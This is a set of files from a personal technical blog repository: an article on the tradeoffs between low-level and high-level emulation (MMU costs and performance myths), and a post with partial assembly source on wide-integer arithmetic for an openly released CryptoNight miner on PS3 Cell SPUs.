35 | - *Too low-level*: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the [Visual 6502](http://www.visual6502.org/) project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little "*development time*"; however, the "*execution time*" would be insanely high due to simulating billions of transistors.
36 |  
37 | As you see, the rule of thumb is: higher-level incurs larger development costs, and lower-level incurs larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the performance of different emulator paradigms.
38 | 
39 | ## Performance myths
40 | 
41 | Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balance "*development time*" vs "*execution time*" and pick the right strategy. How do you estimate those costs, especially "*execution time*", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targeting. The resulting performance will depend on how many "*concepts*" from your *guest machine* (i.e. the thing you're trying to emulate) can be mapped into your *host machine* (the thing that will run the emulator).
42 |  
43 | To give you an example, one such "*concept*" is the MMU. To explain it briefly (and slightly wrong/oversimplified, but it will do for the sake of the explanation), the MMU is the thing that allows each application to have access to a slice of RAM by mapping addresses of a "*virtual address space*" (an imaginary arrangement of memory) to a "*physical address space*" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.
44 |  
45 | - HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy.
46 |  
47 | - LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "*guest virtual memory* to *guest physical memory*" translation by emulating the MMU in software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100s of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers:
48 | 
49 |     1. Guest virtual memory
50 |     2. Guest physical memory
51 |     3. Host virtual memory
52 |     4. Host physical memory
53 |  
54 | However, in some scenarios (this depends on MMU quirks, page sizes, etc.), you could use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having a hypervisor let it directly access a slice of the host computer's physical RAM. This would remove the need for expensive software-based address translation and result in large performance gains.
55 | 
56 | ## Conclusion
57 | 
58 | By making better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [[1]](http://michaelbrundage.com/project/xbox-360-emulator/) and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.
59 |  
60 | Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "*performance penalty*" numbers; everything has to be considered on a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems in real detail.
61 | 


--------------------------------------------------------------------------------
/posts/2018-04-18-lle-vs-hle/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>LLE vs HLE and their tradeoffs</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>LLE vs HLE and their tradeoffs</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2018-04-18</span>
 72 |             </p>
 73 |             <h2 id="introduction">Introduction</h2>
 74 | <p>This article aims to give an intuitive understanding of the terms "<em>Low-Level Emulation</em>" (LLE) and "<em>High-Level Emulation</em>" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.</p>
 75 | <p>Machines are made of several <em>layers of abstraction</em>, each of them relying on the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):</p>
 76 | <ul>
 77 | <li>Game</li>
 78 | <li>Game engine</li>
 79 | <li>System libraries</li>
 80 | <li>Kernel/drivers</li>
 81 | <li>Hardware</li>
 82 | </ul>
 83 | <p>That's where these "<em>low-level</em>" or "<em>high-level</em>" terms come from. Something is more "<em>high-level</em>" when it has more layers of abstraction below it, and it's more "<em>low-level</em>" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below the hardware level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there are also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?</p>
 84 | <h2 id="emulation-paradigms">Emulation paradigms</h2>
 85 | <p>Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system is all about putting a "<em>barrier</em>" between two adjacent layers of abstraction. For instance:</p>
 86 | <ul>
 87 | <li>"<em>LLE emulators</em>" (<a href="http://www.epsxe.com/">EPSXE</a>, <a href="https://pcsx2.net/">PCSX2</a>): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console.</li>
 88 | <li>"<em>HLE emulators</em>" (<a href="https://rpcs3.net/">RPCS3</a>, <a href="https://citra-emu.org/">Citra</a>): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS.</li>
 89 | </ul>
 90 | <p>Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?</p>
 91 | <p>When you place this "emulation" barrier between two layers, you have to <strong>reimplement</strong> the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can <strong>execute</strong> successfully. This results in two costs that you have to balance: "<em>development time</em>" and "<em>execution time</em>". Let me explain why this balance is important with a few extreme examples of poor balances:</p>
 92 | <ul>
 93 | <li>
 94 | <p><em>Too high-level</em>: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what <a href="https://www.scummvm.org/">ScummVM</a> does. However, game engines these days are insanely complex with several million lines of code; it would take you centuries as a single developer to write an emulator that operated at such high levels. The "<em>development time</em>" would be massive, but the "<em>execution time</em>" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system.</p>
 95 | </li>
 96 | <li>
 97 | <p><em>Too low-level</em>: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the <a href="http://www.visual6502.org/">Visual 6502</a> project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little "<em>development time</em>"; however, the "<em>execution time</em>" would be insanely high due to simulating billions of transistors.</p>
 98 | </li>
 99 | </ul>
100 | <p>As you see, the rule of thumb is: higher-level incurs larger development costs, and lower-level incurs larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the performance of different emulator paradigms.</p>
101 | <h2 id="performance-myths">Performance myths</h2>
102 | <p>Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balance "<em>development time</em>" vs "<em>execution time</em>" and pick the right strategy. How do you estimate those costs, especially "<em>execution time</em>", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targeting. The resulting performance will depend on how many "<em>concepts</em>" from your <em>guest machine</em> (i.e. the thing you're trying to emulate) can be mapped into your <em>host machine</em> (the thing that will run the emulator).</p>
103 | <p>To give you an example, one such "<em>concept</em>" is the MMU. To explain it briefly (and slightly wrong/oversimplified, but it will do for the sake of the explanation), the MMU is the thing that allows each application to have access to a slice of RAM by mapping addresses of a "<em>virtual address space</em>" (an imaginary arrangement of memory) to a "<em>physical address space</em>" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.</p>
104 | <ul>
105 | <li>
106 | <p>HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy.</p>
107 | </li>
108 | <li>
109 | <p>LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "<em>guest virtual memory</em> to <em>guest physical memory</em>" translation by emulating the MMU in software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100s of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers:</p>
110 | <ol>
111 | <li>Guest virtual memory</li>
112 | <li>Guest physical memory</li>
113 | <li>Host virtual memory</li>
114 | <li>Host physical memory</li>
115 | </ol>
116 | </li>
117 | </ul>
118 | <p>However, in some scenarios (this depends on MMU quirks, page sizes, etc.), you could use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having a hypervisor let it directly access a slice of the host computer's physical RAM. This would remove the need for expensive software-based address translation and result in large performance gains.</p>
119 | <h2 id="conclusion">Conclusion</h2>
120 | <p>By making better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 <a href="http://michaelbrundage.com/project/xbox-360-emulator/">[1]</a> and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.</p>
121 | <p>Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "<em>performance penalty</em>" numbers; everything has to be considered on a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems in real detail.</p>
122 |         </article>
123 |         <hr>
124 |         <footer>
125 |             <p>
126 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
127 |             </p>
128 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
129 |         </footer>
130 |     </body>
131 | </html>
132 | 


--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2019-02-16
  4 | title: PS3/Cell Cryptomining: Wide arithmetic on SPUs
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | [TOC]
  9 | 
 10 | ## Background
 11 | 
 12 | Some time ago, I implemented a cryptocurrency miner for the [Cell B.E. Architecture](https://en.wikipedia.org/wiki/Cell_(microprocessor)) used in the PlayStation 3 and certain servers. Specifically, the goal was implementing PoW-algorithms based on CryptoNight, described by the [CryptoNote](https://cryptonote.org/standards/) standards and used by [Monero/XMR](https://www.getmonero.org/).
 13 | 
 14 | At their current valuation, no such cryptocurrency can be profitably mined using consumer PlayStation 3 hardware and this situation is not expected to reverse in the short/mid term. Furthermore, possible long-term changes are irrelevant, as newer hardware will increasingly outperform the Cell B.E., raising mining difficulty and the profitability threshold ever further.
 15 | 
 16 | Consequently, I'm releasing the source code of this miner along with blog articles on technical aspects of Cell B.E. that might be of general interest (even if just for historical reasons):
 17 | 
 18 | 1. [PS3/Cell Cryptomining: Wide arithmetic on SPUs](.).
 19 | 2. [PS3/Cell Cryptomining: High-performance AES on SPUs](#). (TBD.)
 20 | 3. [PS3/Cell Cryptomining: Memory Flow Controller](#). (TBD.)
 21 | 
 22 | This first post describes the implementation of wide arithmetic operations on "narrow" ALUs present in the SPUs.
 23 | 
 24 | ## Multiplication (64-bit)
 25 | 
 26 | CryptoNight requires a 64-bit x 64-bit integer multiplication that results in a 128-bit integer. Implementing such an operation on the SPUs is challenging as the largest multiplication granularity available is 16-bit x 16-bit to 32-bit due to the word-size limitations of the SPU ALUs. The following algorithm describes how to emulate such multiplication.
 27 | 
 28 | ### Theory
 29 | 
 30 | Consider the `a` and `b` input registers: the 64-bit LHS and RHS of the multiplication operation are composed of the half-words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
 31 | 
 32 | ```
 33 |    0        16       32       48       64       80       96       112      128
 34 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 35 | a: |   a0   |   a1   |   a2   |   a3   |   XX   |   XX   |   XX   |   XX   |
 36 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 37 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 38 | b: |   b0   |   b1   |   b2   |   b3   |   XX   |   XX   |   XX   |   XX   |
 39 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 40 |    MSB                                                                     LSB
 41 | ```
 42 | 
 43 | This is equivalent to the following representation:
 44 | 
 45 | ```
 46 | LHS := a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)
 47 | RHS := b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48)
 48 | ```
 49 | 
 50 | Applying the distributive property, the multiplication of both values should be equivalent to:
 51 | 
 52 | ```
 53 | LHS * RHS = (a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)) *
 54 |             (b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48))
 55 |           = (a3*b3*2^00) + (a3*b2*2^16) + (a3*b1*2^32) + (a3*b0*2^48) +
 56 |             (a2*b3*2^16) + (a2*b2*2^32) + (a2*b1*2^48) + (a2*b0*2^64) +
 57 |             (a1*b3*2^32) + (a1*b2*2^48) + (a1*b1*2^64) + (a1*b0*2^80) +
 58 |             (a0*b3*2^48) + (a0*b2*2^64) + (a0*b1*2^80) + (a0*b0*2^96)    
 59 | ```
 60 | 
 61 | Our implementation will perform these 16 multiplications of 16-bit half-words (`aX*bY`), shift the results (`*2^N`), and add everything together using 128-bit additions.
 62 | 
 63 | ### Implementation
 64 | 
 65 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
 66 | 
 67 | > * `mpy rt,ra,rb`: **Multiply**. The signed 16 least significant bits of the corresponding word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
 68 | > * `mpyhh rt,ra,rb`: **Multiply high high**. The signed 16 most significant bits of the word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
 69 | 
 70 | When necessary, unsigned variants are available by adding a `u` suffix to the instruction name.
 71 | 
 72 | #### 1. Multiplying half-words
 73 | 
 74 | The distributive unfolding of the multiplication described earlier involves multiplying 16 half-word pairs into 16 words. Each multiplication instruction yields a maximum of four 32-bit words, but since only 64 bits are used in `a` and `b`, only 2 are useful.
 75 | 
 76 | To minimize the number of multiplications, we can duplicate/shuffle half-words to the unused 64 bits of the quad-word via `shufb` as follows (this step can also be used to switch endianness, if necessary):
 77 | 
 78 | ```
 79 |    0        16       32       48       64       80       96       112      128
 80 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 81 | a: |   a0   |   a1   |   a2   |   a3   |   a2   |   a3   |   a0   |   a1   |
 82 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 83 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 84 | b: |   b0   |   b1   |   b2   |   b3   |   b0   |   b1   |   b2   |   b3   |
 85 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 86 |    MSB                                                                     LSB
 87 | ```
 88 | 
 89 | Additionally, we left-shift both `a` and `b` by 16 bits into `c` and `d`, respectively, to do high-low multiplications (similarly to the `mpyh` instruction but without post-shifting). It does not matter whether the least significant half-word is zeroed. The result is:
 90 | 
 91 | ```
 92 |    0        16       32       48       64       80       96       112      128
 93 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 94 | c: |   a1   |  (a2)  |   a3   |  (a2)  |   a3   |  (a0)  |   a1   |  (00)  |
 95 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 96 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 97 | d: |   b1   |  (b2)  |   b3   |  (b0)  |   b1   |  (b2)  |   b3   |  (00)  |
 98 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 99 |    MSB                                                                     LSB
100 | ```
101 | 
102 | This way we can generate all necessary multiplications as follows:
103 | 
104 | ```
105 | mpy     t0, a, b
106 | mpyhh   t1, a, d
107 | mpyhh   t2, b, c
108 | mpyhh   t3, a, b
109 | ```
110 | 
111 | Leaving us with the following results:
112 | 
113 | ```
114 |    0        16       32       48       64       80       96       112      128
115 |    +--------+--------+--------+--------+--------+--------+--------+--------+
116 | t0 |     a1 * b1     |     a3 * b3     |     a3 * b1     |     a1 * b3     |
117 |    +--------+--------+--------+--------+--------+--------+--------+--------+
118 |    +--------+--------+--------+--------+--------+--------+--------+--------+
119 | t1 |     a0 * b1     |     a2 * b3     |     a2 * b1     |     a0 * b3     |
120 |    +--------+--------+--------+--------+--------+--------+--------+--------+
121 |    +--------+--------+--------+--------+--------+--------+--------+--------+
122 | t2 |     b0 * a1     |     b2 * a3     |     b0 * a3     |     b2 * a1     |
123 |    +--------+--------+--------+--------+--------+--------+--------+--------+
124 |    +--------+--------+--------+--------+--------+--------+--------+--------+
125 | t3 |     a0 * b0     |     a2 * b2     |     a2 * b0     |     a0 * b2     |
126 |    +--------+--------+--------+--------+--------+--------+--------+--------+
127 |    MSB                                                                     LSB
128 | ```
129 | 
130 | #### 2. Shuffling half-words
131 | 
132 | Before adding each of these 16 words, we need to multiply each by the corresponding power of 2 computed previously (i.e. shifting by a certain amount in bits). These constants are:
133 | 
134 | ```
135 |    0        16       32       48       64       80       96       112      128
136 |    +--------+--------+--------+--------+--------+--------+--------+--------+
137 | t0 | t00          64 | t01           0 | t02          32 | t03          32 |
138 |    +--------+--------+--------+--------+--------+--------+--------+--------+
139 |    +--------+--------+--------+--------+--------+--------+--------+--------+
140 | t1 | t10          80 | t11          16 | t12          48 | t13          48 |
141 |    +--------+--------+--------+--------+--------+--------+--------+--------+
142 |    +--------+--------+--------+--------+--------+--------+--------+--------+
143 | t2 | t20          80 | t21          16 | t22          48 | t23          48 |
144 |    +--------+--------+--------+--------+--------+--------+--------+--------+
145 |    +--------+--------+--------+--------+--------+--------+--------+--------+
146 | t3 | t30          96 | t31          32 | t32          64 | t33          64 |
147 |    +--------+--------+--------+--------+--------+--------+--------+--------+
148 |    MSB                                                                     LSB
149 | ```
150 | 
151 | We need to move these words into their proper locations (note that some words like `t02` or `t30` are already well placed). Using scratch registers is necessary, since working directly on {t0, t1, t2, t3} would cause bits to get lost due to overlaps. Doing this naively would involve using 16 scratch registers, i.e. sixteen 128-bit integers to be added later on.
152 | 
153 | However, by shuffling bytes via `shufb` we can bring this down to only 7 scratch registers:
154 | 
155 | ```
156 |    128      112      96       80       64       48       32       16       0
157 |    +--------+--------+--------+--------+--------+--------+--------+--------+
158 | v0 |                 | ##### t00 ##### | ##### t02 ##### | ##### t01 ##### |
159 |    +--------+--------+--------+--------+--------+--------+--------+--------+
160 |    +--------+--------+--------+--------+--------+--------+--------+--------+
161 | v1 | ##### t30 ##### | ##### t32 ##### | ##### t31 ##### |                 |
162 |    +--------+--------+--------+--------+--------+--------+--------+--------+
163 |    +--------+--------+--------+--------+--------+--------+--------+--------+
164 | v2 |                 | ##### t33 ##### | ##### t03 ##### |                 |
165 |    +--------+--------+--------+--------+--------+--------+--------+--------+
166 |    +--------+--------+--------+--------+--------+--------+--------+--------+
167 | v3 |        | ##### t10 ##### | ##### t12 ##### | ##### t11 ##### |        |
168 |    +--------+--------+--------+--------+--------+--------+--------+--------+
169 |    +--------+--------+--------+--------+--------+--------+--------+--------+
170 | v4 |        | ##### t20 ##### | ##### t22 ##### | ##### t21 ##### |        |
171 |    +--------+--------+--------+--------+--------+--------+--------+--------+
172 |    +--------+--------+--------+--------+--------+--------+--------+--------+
173 | v5 |                          | ##### t13 ##### |                          |
174 |    +--------+--------+--------+--------+--------+--------+--------+--------+
175 |    +--------+--------+--------+--------+--------+--------+--------+--------+
176 | v6 |                          | ##### t23 ##### |                          |
177 |    +--------+--------+--------+--------+--------+--------+--------+--------+
178 |    MSB                                                                     LSB
179 | ```
180 | 
181 | This is accomplished by the following operations (note that only 5 shuffle masks are necessary):
182 | 
183 | ```
184 | shufb   v0, t0, t0, mask_v0
185 | shufb   v1, t3, t3, mask_v1
186 | shufb   v2, t0, t3, mask_v2
187 | shufb   v3, t1, t1, mask_v3_v4
188 | shufb   v4, t2, t2, mask_v3_v4
189 | shufb   v5, t1, t1, mask_v5_v6
190 | shufb   v6, t2, t2, mask_v5_v6
191 | ```
192 | 
193 | #### 3. Adding results
194 | 
195 | The final step is adding the 7 resulting 128-bit words {v0, ..., v6} as described by the algorithm "*Addition (128-bit)*". Let this algorithm be implemented by the macro `add_128(output, lhs, rhs)`. The final result `r` of the multiplication algorithm is computed as follows:
196 | 
197 | ```
198 | add_128  t0, v0, v1
199 | add_128  t1, v2, v3
200 | add_128  t2, v4, v5
201 | add_128  t0, t0, t1
202 | add_128  t0, t0, t2
203 | add_128   r, t0, v6
204 | ```
205 | 
206 | As a final step, one might shuffle bytes again to match the desired endianness.
207 | 
208 | ## Addition (128-bit)
209 | 
210 | During the implementation of "*Multiplication (64-bit)*" we required a 128-bit + 128-bit integer addition that results in a 128-bit integer, but the largest granularity we can achieve for additions in SPUs is 32-bit. Although our approach here is relatively straightforward, we document it here for the sake of completeness.
211 | 
212 | ### Theory
213 | 
214 | Consider the input registers `a` and `b`, holding the 128-bit LHS and RHS of the addition, composed of the 32-bit words [a0, a1, a2, a3] and [b0, b1, b2, b3] respectively, and the output register `s`, composed of the 32-bit words [s0, s1, s2, s3].
215 | 
216 | ```
217 |    0                 32                64                96                128
218 |    +-----------------+-----------------+-----------------+-----------------+
219 | a: |        a0       |        a1       |        a2       |        a3       |  
220 |    +-----------------+-----------------+-----------------+-----------------+
221 |    +-----------------+-----------------+-----------------+-----------------+
222 | b: |        b0       |        b1       |        b2       |        b3       |
223 |    +-----------------+-----------------+-----------------+-----------------+
224 |    MSB                                                                     LSB
225 | ```
226 | 
227 | This is equivalent to the following representation:
228 | 
229 | ```
230 | LHS := a3 + (a2 * 2^32) + (a1 * 2^64) + (a0 * 2^96)
231 | RHS := b3 + (b2 * 2^32) + (b1 * 2^64) + (b0 * 2^96)
232 | ```
233 | 
234 | Similar to a four-bit adder, we perform the addition component-wise, propagating the carry bit from the LSW to the MSW. We represent this carry bit with the `overflow` function (shortened as `o`), which takes an addition result and outputs 1 if that result is >= 2^32, and 0 otherwise.
235 | 
236 | ```
237 | s3 = a3 + b3
238 | s2 = a2 + b2 + overflow(s3)
239 | s1 = a1 + b1 + overflow(s2)
240 | s0 = a0 + b0 + overflow(s1)
241 | ```
242 | 
243 | ### Implementation
244 | 
245 | First of all, let's recap the SPU instructions relevant to addition (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
246 | 
247 | > * `a rt,ra,rb`: **Add Word**. Each word element of register `ra` is added to the corresponding word element of register `rb`, and the results are placed in the corresponding word elements of register `rt`.
248 | > * `cg rt,ra,rb`: **Carry Generate**. Each word element of register `ra` is added to the corresponding word element of register `rb`. The carry out is placed in the least significant bit of the corresponding word element of register `rt`, and 0 is placed in the remaining bits of `rt`.
249 | > * `shlqbyi rt,ra,value`: **Shift Left Quadword by Bytes Immediate**. The contents of register `ra` are shifted left by the number of bytes specified by the unsigned 5-bit `value`. The result is placed in register `rt`.
250 | 
251 | #### 1. Basic idea
252 | 
253 | By using these instructions, we can perform this addition as follows:
254 | 
255 | ```
256 |    +-----------------+-----------------+-----------------+-----------------+
257 | t0 | t00:   a0 + b0  | t01:   a1 + b1  | t02:   a2 + b2  | t03:   a3 + b3  |
258 |    +-----------------+-----------------+-----------------+-----------------+
259 | c0 | c00: o(a1 + b1) | c01: o(a2 + b2) | c02: o(a3 + b3) |                 |
260 |    +-----------------+-----------------+-----------------+-----------------+
261 |    +-----------------+-----------------+-----------------+-----------------+
262 | t1 | t10:   t00+c00  | t11:   t01+c01  | t12:   t02+c02  |                 |
263 |    +-----------------+-----------------+-----------------+-----------------+
264 | c1 | c10: o(t01+c01) | c11: o(t02+c02) |                 |                 |
265 |    +-----------------+-----------------+-----------------+-----------------+
266 |    +-----------------+-----------------+-----------------+-----------------+
267 | t2 | t20:   t10+c10  | t21:   t11+c11  |                 |                 |
268 |    +-----------------+-----------------+-----------------+-----------------+
269 | c2 | c20: o(t11+c11) |                 |                 |                 |
270 |    +-----------------+-----------------+-----------------+-----------------+
271 |    +-----------------+-----------------+-----------------+-----------------+
272 | t3 | t30:   t20+c20  |                 |                 |                 |
273 |    +-----------------+-----------------+-----------------+-----------------+
274 | ```
275 | 
276 | Here, at each iteration *N = {0,1,2,3}*, the temporary variable *tN* contains the 32-bit componentwise addition of *tN-1* and *cN-1*. This can easily be done with the `a` instruction described before. The temporary variables *cN* contain the word-shifted carry bit of said addition, which can be achieved by a combination of the `cg` and `shlqbyi` instructions.
277 | 
278 | This process is kickstarted by computing the addition and shifted overflow of the original LHS and RHS components into the *t0* and *c0* registers respectively. The final output register `r` can simply be computed as [t30, t21, t12, t03].
279 | 
280 | #### 2. Optimizing register usage
281 | 
282 | By analyzing dependencies, you might observe that no more than 3 temporary variables are used at any time. Let's redefine these as `t0`, `t1`, `t2`. Additionally, given that left-shifts are always zero-extended, we can preserve the LSWs as we "carry on" with the computation (no pun intended), saving us from cherry-picking words from different temporaries into `r`.
283 | 
284 | The final algorithm would look like this:
285 | 
286 | ```
287 | cg         t1, lhs, rhs
288 | a          t0, lhs, rhs
289 | shlqbyi    t1, t1, 4
290 | cg         t2, t0, t1
291 | a          t0, t0, t1
292 | shlqbyi    t2, t2, 4
293 | cg         t1, t0, t2
294 | a          t0, t0, t2
295 | shlqbyi    t1, t1, 4
296 | a           r, t0, t1
297 | ```
298 | 
299 | Note that the same approach is used to perform 64-bit additions, required in CryptoNight's Memory-Hard Loop.
300 | 
301 | ## Sources
302 | 
303 | You can find the source code for these implementations in: [`arithmetic.s`](arithmetic.s).
304 | 


--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/arithmetic.s:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * SPU high-performance wide arithmetic.
  3 |  * Author: Alexandro Sanchez Bach <alexandro@phi.nz>.
  4 |  */
  5 | 
  6 | // Registers
  7 | // $80-$90 hold the 16-byte constants defined below; alu_constants_init loads all of them.
  8 | #define alu_reg_se32       $80
  9 | #define alu_reg_se64       $81
 10 | #define alu_reg_se128      $82
 11 | #define alu_reg_mul_lhs    $83
 12 | #define alu_reg_mul_rhs    $84
 13 | #define alu_reg_mul_m0     $85
 14 | #define alu_reg_mul_m1     $86
 15 | #define alu_reg_mul_m2     $87
 16 | #define alu_reg_mul_m3     $88
 17 | #define alu_reg_mul_m4     $89
 18 | #define alu_reg_add_m64    $90
 19 | // $40-$52 are scratch registers overwritten by the add_64 / add_128 / mul_64 macros.
 20 | #define alu_reg_i0         $40
 21 | #define alu_reg_i1         $41
 22 | #define alu_reg_t0         $42
 23 | #define alu_reg_t1         $43
 24 | #define alu_reg_t2         $44
 25 | #define alu_reg_t3         $45
 26 | #define alu_reg_v0         $46
 27 | #define alu_reg_v1         $47
 28 | #define alu_reg_v2         $48
 29 | #define alu_reg_v3         $49
 30 | #define alu_reg_v4         $50
 31 | #define alu_reg_v5         $51
 32 | #define alu_reg_v6         $52
 33 | 
 34 | // Constants
 35 | 
 36 |     .align 4
 37 |     .global alu_endian
 38 | alu_endian:
 39 |     // swap-endian-32: byte indices reversed within each 32-bit word (loaded into alu_reg_se32)
 40 |     .byte  0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
